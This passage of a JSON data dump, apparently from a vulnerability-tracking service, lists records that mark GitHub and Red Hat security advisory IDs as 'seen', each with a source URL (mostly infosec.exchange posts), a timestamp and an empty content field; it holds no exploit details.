"creation_timestamp": "2024-11-07T18:08:17.828961Z"}, {"uuid": "94b8ae0c-cafb-4b78-bdfc-b66b613900f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7mr7-4f54-vcx5", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113444304438437350", "content": "", "creation_timestamp": "2024-11-07T23:38:32.299223Z"}, {"uuid": "b57bb75e-cb83-4048-a007-01c86005869a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6jrf-rcjf-245r", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113444304452588220", "content": "", "creation_timestamp": "2024-11-07T23:38:32.676196Z"}, {"uuid": "e87395fc-3120-4534-b6dc-772274db135c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hfq9-hggm-c56q", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113444334036917014", "content": "", "creation_timestamp": "2024-11-07T23:46:03.840977Z"}, {"uuid": "e4d3d8ff-7c40-4e2f-b961-48074896c19b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cgr4-c233-h733", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113476328977045887", "content": "", "creation_timestamp": "2024-11-13T15:22:48.193230Z"}, {"uuid": "0f355587-8c73-4588-9455-c93ed7be16aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8237-957h-h2c2", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113476328992893189", "content": "", "creation_timestamp": "2024-11-13T15:22:48.580853Z"}, {"uuid": "50f256ef-1317-48d1-a91e-90012fb816fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cgr4-c233-h733", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113476341957730359", "content": "", "creation_timestamp": "2024-11-13T15:26:06.055867Z"}, {"uuid": "8dfe6dd7-4f38-4b58-83a4-21f4b4bd196d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8237-957h-h2c2", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113476341971808030", "content": "", "creation_timestamp": "2024-11-13T15:26:06.885318Z"}, {"uuid": "5847c05b-5e79-48a2-8357-e14de4d6092d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hph4-7j37-7c97", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113476436967747574", "content": "", "creation_timestamp": "2024-11-13T15:50:15.725310Z"}, {"uuid": "0da6c810-6b83-4671-9a6c-878f04b99eb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-45v9-gfcv-xcq6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113476467414144768", "content": "", "creation_timestamp": "2024-11-13T15:58:00.281876Z"}, {"uuid": "63ab9d9f-ef3d-4362-af3c-c133a7f81db7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f3cw-hg6r-chfv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113476506692863958", "content": "", "creation_timestamp": "2024-11-13T16:07:59.686330Z"}, {"uuid": "f3251785-07b9-4e1d-9739-6fc4625bd2ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cg23-qf8f-62rr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113476554727172279", "content": "", "creation_timestamp": "2024-11-13T16:20:12.650914Z"}, {"uuid": "d50bea0f-aab1-427c-969f-43c1a63c9fa5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jrh5-vhr9-qh7q", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113476554741751320", "content": "", "creation_timestamp": "2024-11-13T16:20:13.164027Z"}, {"uuid": "2f8457f6-8929-4e5d-b250-270bf7529e56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cw6g-qmjq-6w2w", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113476554756372670", "content": "", "creation_timestamp": "2024-11-13T16:20:13.543512Z"}, {"uuid": "64ef18f9-4928-4ee6-945e-70549c6cbf32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jh6x-7xfg-9cq2", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113518482956739858", "content": "", "creation_timestamp": "2024-11-21T02:03:07.018088Z"}, {"uuid": "077ac94a-001a-4178-9508-c4e173b2f112", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xwxc-w7v3-2p4j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113515721004503367", "content": "", "creation_timestamp": "2024-11-20T14:20:42.539845Z"}, {"uuid": "7f43038f-cab9-40dd-b06a-f3012620163e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pjwm-cr36-mwv3", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113482560392129920", "content": "", "creation_timestamp": "2024-11-14T17:47:31.946768Z"}, {"uuid": "014def1b-7eef-417b-bec0-d7b06c055a18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p2h2-3vg9-4p87", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113483800434488994", "content": "", "creation_timestamp": "2024-11-14T23:02:53.521286Z"}, {"uuid": "db0fd597-501d-4758-bec8-470c11976e4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4mvw-j8r9-xcgc", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113504598595669058", "content": "", "creation_timestamp": "2024-11-18T15:12:08.078467Z"}, {"uuid": "53ed55c8-149d-4d55-9e68-2e69b01908ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c3hj-hg7p-rrq5", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113482052715292248", "content": "", "creation_timestamp": "2024-11-14T15:38:25.289368Z"}, {"uuid": "47210d83-aee2-411b-8cf1-ff628cdf199b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m26c-fcgh-cp6h", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113504997750093120", "content": "", "creation_timestamp": "2024-11-18T16:53:38.876298Z"}, {"uuid": "2fc4113f-54a4-4431-8aeb-2d564611bfbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw4x-v69f-hh5w", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113505054477519291", "content": "", "creation_timestamp": "2024-11-18T17:08:04.350745Z"}, {"uuid": "94fb5e6d-a84e-46be-920f-141996b5ee07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7cc9-j4mv-vcjp", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113505700408685113", "content": "", "creation_timestamp": "2024-11-18T19:52:20.634993Z"}, {"uuid": "76f18128-b67a-43cb-adbd-d87d2fb1543d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rjg4-cf66-x6gr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113505930043842342", "content": "", "creation_timestamp": "2024-11-18T20:50:44.292697Z"}, {"uuid": "418f364f-14ed-4fd5-9c5b-1df23c2bf45c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j8gc-xpgr-2ww7", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113504938736096055", "content": "", "creation_timestamp": "2024-11-18T16:38:38.282795Z"}, {"uuid": "9ce65dbb-8382-476c-b788-e19e9b4c8453", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0094", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113481884933073861", "content": "", "creation_timestamp": "2024-11-14T14:55:45.108092Z"}, {"uuid": "3e56e8dc-03e0-4ba9-8495-315f137bc6d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0095", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113481884933073861", "content": "", "creation_timestamp": "2024-11-14T14:55:45.133865Z"}, {"uuid": "184c15f2-7e48-4222-8c76-7e6fd0d83dab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0096", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113481884933073861", "content": "", "creation_timestamp": "2024-11-14T14:55:45.156657Z"}, {"uuid": "9daa0999-4a51-42ea-b578-ed46cb41004a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xh4g-c9p6-5jxg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113487892490978139", "content": "", "creation_timestamp": "2024-11-15T16:23:34.060182Z"}, {"uuid": "84defa91-06c9-4d1c-9575-c9d33de88a06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8pr-g25r-58xj", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113488105435139398", "content": "", "creation_timestamp": "2024-11-15T17:17:42.535059Z"}, {"uuid": "ab705d02-4b3c-4a99-97b9-776d52c7f083", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3j2f-3j4v-hppr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113488766565317248", "content": "", "creation_timestamp": "2024-11-15T20:05:50.721042Z"}, {"uuid": "65b69ce6-93d0-49e7-99fd-b845bc618e82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xrm2-m72w-w4x4", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113489075470257480", "content": "", "creation_timestamp": "2024-11-15T21:24:24.087487Z"}, {"uuid": "4b9a6704-ee8a-4854-9ed2-40d646720085", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wq6v-vx8c-8fj8", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113505015541543695", "content": "", "creation_timestamp": "2024-11-18T16:58:10.235251Z"}, {"uuid": "d3fca6be-74c2-48d6-8faa-933c362a4722", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vggm-3478-vm5m", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113505860881634371", "content": "", "creation_timestamp": "2024-11-18T20:33:09.115005Z"}, {"uuid": "c5b2cd58-edd7-443f-bc92-1f93211a3e55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v7w9-63xh-6r3w", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113487892506879852", "content": "", "creation_timestamp": "2024-11-15T16:23:34.249807Z"}, {"uuid": "420c3823-16a5-4e64-9d3b-25b8fb8a327b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hrxh-9w67-g4cv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113488105450265203", "content": "", "creation_timestamp": "2024-11-15T17:17:42.832051Z"}, {"uuid": "3ca9df34-9a64-46a4-822a-3463174d1f63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmhx-hwph-q6mc", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113488202426408153", "content": "", "creation_timestamp": "2024-11-15T17:42:22.707702Z"}, {"uuid": "d1f42ebc-d01a-44a5-95b1-8b0a9a0ab50c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c2r5-cfqr-c553", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113505179980465800", "content": "", "creation_timestamp": "2024-11-18T17:39:59.836707Z"}, {"uuid": "e86b7e92-900e-4d23-b0e2-2c896a0d725e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8qhp-jhhw-45r2", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113505930058010161", "content": "", "creation_timestamp": "2024-11-18T20:50:44.711918Z"}, {"uuid": "c564c6aa-bd8a-47de-8db1-d3c620ca9a2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gfwr-xqmj-j27v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113487688865692955", "content": "", "creation_timestamp": "2024-11-15T15:31:46.121192Z"}, {"uuid": "40f9ec89-d4b2-4045-bab3-3d8ca790b222", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w7v5-mgxm-v6gm", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113488015431757561", "content": "", "creation_timestamp": "2024-11-15T16:54:49.449861Z"}, {"uuid": "fb09d53e-f570-4e38-b5ff-f9bb1229194e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gxph-5m4j-pfmj", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113488105419832343", "content": "", "creation_timestamp": "2024-11-15T17:17:42.296541Z"}, {"uuid": "436eb1ea-d4d7-46d5-960b-04054283d640", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pwpp-fvcr-w862", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113488261446606409", "content": "", "creation_timestamp": "2024-11-15T17:57:23.069082Z"}, {"uuid": "090645a9-8028-4fe1-94c9-0efe4aec8258", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hwgg-qvjx-572x", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113505769920267707", "content": "", "creation_timestamp": "2024-11-18T20:10:01.114796Z"}, {"uuid": "817cf271-e884-46cf-ac71-2d1bc385246d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ffp2-8p2h-4m5j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113516183337616902", "content": "", "creation_timestamp": "2024-11-20T16:18:17.230684Z"}, {"uuid": "e5a2a4dc-6b8d-4c8e-955e-20a3c19e79de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j73h-x6j3-m479", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113488856541985424", "content": "", "creation_timestamp": "2024-11-15T20:28:43.557278Z"}, {"uuid": "cafafc4a-9905-4b39-a5c9-d4c35472105e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjf3-7x72-pqm9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113489431661732928", "content": "", "creation_timestamp": "2024-11-15T22:54:59.061999Z"}, {"uuid": "5ff5e916-e877-481b-bde2-346e351ff132", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j95p-7936-f75w", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113505730866493568", "content": "", "creation_timestamp": "2024-11-18T20:00:05.358251Z"}, {"uuid": "ca7bd73f-ccfc-4ebf-a342-a0bbb1ff2943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8495-4g3g-x7pr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113505821932526019", "content": "", "creation_timestamp": "2024-11-18T20:23:14.930125Z"}, {"uuid": "15028973-e636-4db8-965a-889dafdcea50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-42w6-r45m-9w9j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113488015417639445", "content": "", "creation_timestamp": "2024-11-15T16:54:49.091661Z"}, {"uuid": "89b09d95-74cb-4183-ab30-e92718b121fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmhx-hwph-q6mc", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113488187902526394", "content": "", "creation_timestamp": "2024-11-15T17:38:41.294190Z"}, {"uuid": "23148d84-4b6d-43a4-9c74-fb050af7856e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-27mf-ghqm-j3j8", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113505769937063933", "content": "", "creation_timestamp": "2024-11-18T20:10:01.373656Z"}, {"uuid": "30cb1b74-b9ef-4244-97c4-e0e44e990902", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gjcc-jvgw-wvwj", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113517271415805462", "content": "", "creation_timestamp": "2024-11-20T20:55:00.514377Z"}, {"uuid": "5e0983e3-4262-4f22-87f6-1890fc916831", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8843-r3m7-gfqx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113488323439962524", "content": "", "creation_timestamp": "2024-11-15T18:13:08.977470Z"}, {"uuid": "f467fd12-9ced-4895-93a5-7daa985ff19e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r4qc-m9mj-452v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113488261461288267", "content": "", "creation_timestamp": "2024-11-15T17:57:23.671659Z"}, {"uuid": "395ef6de-4aee-4c9b-89b1-ef550fe5c19e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xwmx-mmrf-hqf9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113488382438414219", "content": "", "creation_timestamp": "2024-11-15T18:28:09.156689Z"}, {"uuid": "f6669d5b-5f3a-4cb7-8ba2-6145d56f6f37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xcc-vm3f-m8rw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113550702902794180", "content": "", "creation_timestamp": "2024-11-26T18:37:04.493933Z"}, {"uuid": "cecf45e6-274f-4092-802f-1547613f1a6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2m9h-r57g-45pj", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113595269131048543", "content": "", "creation_timestamp": "2024-12-04T15:30:50.764013Z"}, {"uuid": "26a61f61-26ad-4af8-8229-d16470fd6502", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93rv-45r8-h5j4", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113596914554726205", "content": "", "creation_timestamp": "2024-12-04T22:29:17.910736Z"}, {"uuid": "5d0943ac-84e0-4dcc-8dea-5bb217bbf05a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcxm-7wvp-g6p5", "type": "seen", "source": "https://infosec.exchange/users/obivan/statuses/113596254096758916", "content": "", "creation_timestamp": "2024-12-04T19:41:19.895506Z"}, {"uuid": "b5e75e12-c571-45dc-9200-fbb6bfcada1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v7vm-rhmg-8j2r", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113550775070386580", "content": "", "creation_timestamp": "2024-11-26T18:55:27.657433Z"}, {"uuid": "119c76e7-2ffc-4cf6-8097-98c11098a3dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7p75-mf53-ffwm", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113556357978279669", "content": "", "creation_timestamp": "2024-11-27T18:35:13.792261Z"}, {"uuid": "a2b6e6ba-b199-4654-a5e1-56e843a5a118", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h9q2-fcc6-r65c", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113556417038312731", "content": "", "creation_timestamp": "2024-11-27T18:50:15.056667Z"}, {"uuid": "f05be0ad-35fb-429c-8117-6140348f3995", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-444j-93j3-5gj4", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113556358006944409", "content": "", "creation_timestamp": "2024-11-27T18:35:14.403893Z"}, {"uuid": "ad3263a0-6d92-4623-9e34-9ebfab85374b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4chj-3c28-gvmp", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113567658636613264", "content": "", "creation_timestamp": "2024-11-29T18:29:08.149428Z"}, {"uuid": "fad8dc13-41ef-45fa-b404-8e62c3759fb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qjj3-gqx7-438w", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113556357993210876", "content": "", "creation_timestamp": "2024-11-27T18:35:14.046732Z"}, {"uuid": "3fcca7c5-dde4-4a04-a993-0ed1a5bfdc35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hjwq-mjwj-4x6c", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113567706117816571", "content": "", "creation_timestamp": "2024-11-29T18:41:12.634706Z"}, {"uuid": "a793d9e6-a96d-40d0-ac18-fc42bd849b9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jpmc-7p9c-4rxf", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113602773788528967", "content": "", "creation_timestamp": "2024-12-05T23:19:22.664102Z"}, {"uuid": "16016792-6a8b-413d-a390-86eba8767286", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c45w-xwww-rfgg", "type": "seen", "source": "https://alecmuffett.com/article/110753", "content": "", "creation_timestamp": "2024-12-09T07:48:00.000000Z"}, {"uuid": "f1a98d55-e092-4f66-bf27-7bd889bf3a06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pc5v-xp44-5mgv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113545237501595850", "content": "", "creation_timestamp": "2024-11-25T19:27:08.823500Z"}, {"uuid": "7e449283-189e-40bb-a9b0-f31ab8fe21cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-crjw-x84h-h6x3", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113556358020733569", "content": "", "creation_timestamp": "2024-11-27T18:35:14.262291Z"}, {"uuid": "7cd88c36-386c-40b2-bd6a-5dc0f16ab757", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m75q-8vj8-wppw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113567774011862667", "content": "", "creation_timestamp": "2024-11-29T18:58:28.483431Z"}, {"uuid": "ba2767fd-cd84-4cc0-9fbd-efc31756d59d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7q7m-cgw8-px4r", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113545160626933910", "content": "", "creation_timestamp": "2024-11-25T19:07:35.748365Z"}, {"uuid": "79d103a3-daa5-4615-be93-f30dff9c0cdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rjjv-87mx-6x3h", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113545203266583667", "content": "", "creation_timestamp": "2024-11-25T19:18:26.265499Z"}, {"uuid": "0f258303-e5aa-4c80-9300-d3c7b09eb3d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7mwh-q3xm-qh6p", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113589692294110204", "content": "", "creation_timestamp": 